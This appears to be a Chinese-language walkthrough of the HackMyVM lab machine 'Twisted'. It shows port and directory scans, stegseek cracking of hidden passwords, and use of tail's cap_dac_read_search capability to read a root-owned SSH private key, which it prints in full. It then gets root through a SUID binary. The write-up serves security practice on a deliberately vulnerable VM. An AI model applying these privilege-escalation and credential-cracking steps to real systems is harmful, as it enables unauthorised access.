11.Twisted
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=Twisted
作者:sml
难度:⭐️⭐️
知识点:capbility提权 、stegseek解密图片加密
2. 端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS 192.168.9.13 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 16:02 CST
Nmap scan report for 192.168.9.13
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
MAC Address: 08:00:27:4A:6C:9F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.20 seconds
看下网站
把两张图片保存到本地
3. 目录扫描
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.9.13/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.13/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,php,html,png,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================
啥都没有
4. 图片解密
misc做的少,试了好几种方式没解出来。看了下wp用 stegseek爆破
- stegseek --seed cat-hidden.jpg 检测是否使用steghide进行编码
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# stegseek --seed cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found (possible) seed: "841e4403"
Plain size: 47.0 Byte(s) (compressed)
Encryption Algorithm: rijndael-128
Encryption Mode: cbc
- stegseek --crack 爆破解密
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# stegseek --crack cat-hidden.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# stegseek --crack cat-original.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# cat cat-hidden.jpg.out
thisismypassword
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# cat cat-original.jpg.out
markuslovesbonita
意思是markuslovesbonita 是他的密码?
原始文件名可能是用户名 markus mateo
经过测试获取到两个用户与对应的账户密码
markus markuslovesbonita
mateo thisismypassword
ssh端口就是2222
5. 提权到bonita
markus@twisted:~$ find / -perm -4000 2>/dev/null
/home/bonita/beroot
/usr/bin/su
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
markus@twisted:~$ sudo -l
-bash: sudo: command not found
markus@twisted:~$ cd /home/bonita/
markus@twisted:/home/bonita$ ./beroot
-bash: ./beroot: Permission denied
看来是需要我们先整到bonita用户
看下给markus我们的提示
markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id\_rsa here: /var/cache/apt/id\_rsa
告诉我们这里存在Bonista用户的私钥
markus@twisted:/var/cache/apt$ ls -l
total 62172
drwxr-xr-x 3 root root 12288 Oct 14 2020 archives
-rw------- 1 root root 1823 Oct 14 2020 id\_rsa
-rw-r--r-- 1 root root 31831069 Oct 14 2020 pkgcache.bin
-rw-r--r-- 1 root root 31810419 Oct 14 2020 srcpkgcache.bin
但我们没有权限读取这个私钥
mateo的提示
mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wav
听一下这个音频感觉像是摩斯电码
G O D E E P E R . . . C O M E W I T H M E . . . L I T T L E R A B B I T . . .
好像没有什么意义
常见的提权SUID 与 SUDO 都看了
看一下Capability
mateo@twisted:/var/www/html$ /sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap\_net\_raw+ep
/usr/bin/tail = cap\_dac\_read\_search+ep
用tail读取私钥
tail -c1G "/var/cache/apt/id\_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd
FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS
olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1
vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF
gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C
tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM
gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC
xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8
DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H
uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD
XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu
U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI
mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/
hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro
nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
利用私钥切换到bonita用户
ssh -i id\_rsa bonita@192.168.9.13 -p 2222
bonita@twisted:~$ cat user.txt
HMVblackcat
6. 提权到root
执行bonita目录下的beroot
提示我们需要密码
想到最开始利用stegseek时还有两个没有用上
sexymama
westlife
试了一下都是错的
逆向一下这个可执行文件看看
code应该就是5880
成功提权root
bonita@twisted:~$ ./beroot
Enter the code:
5880
root@twisted:~#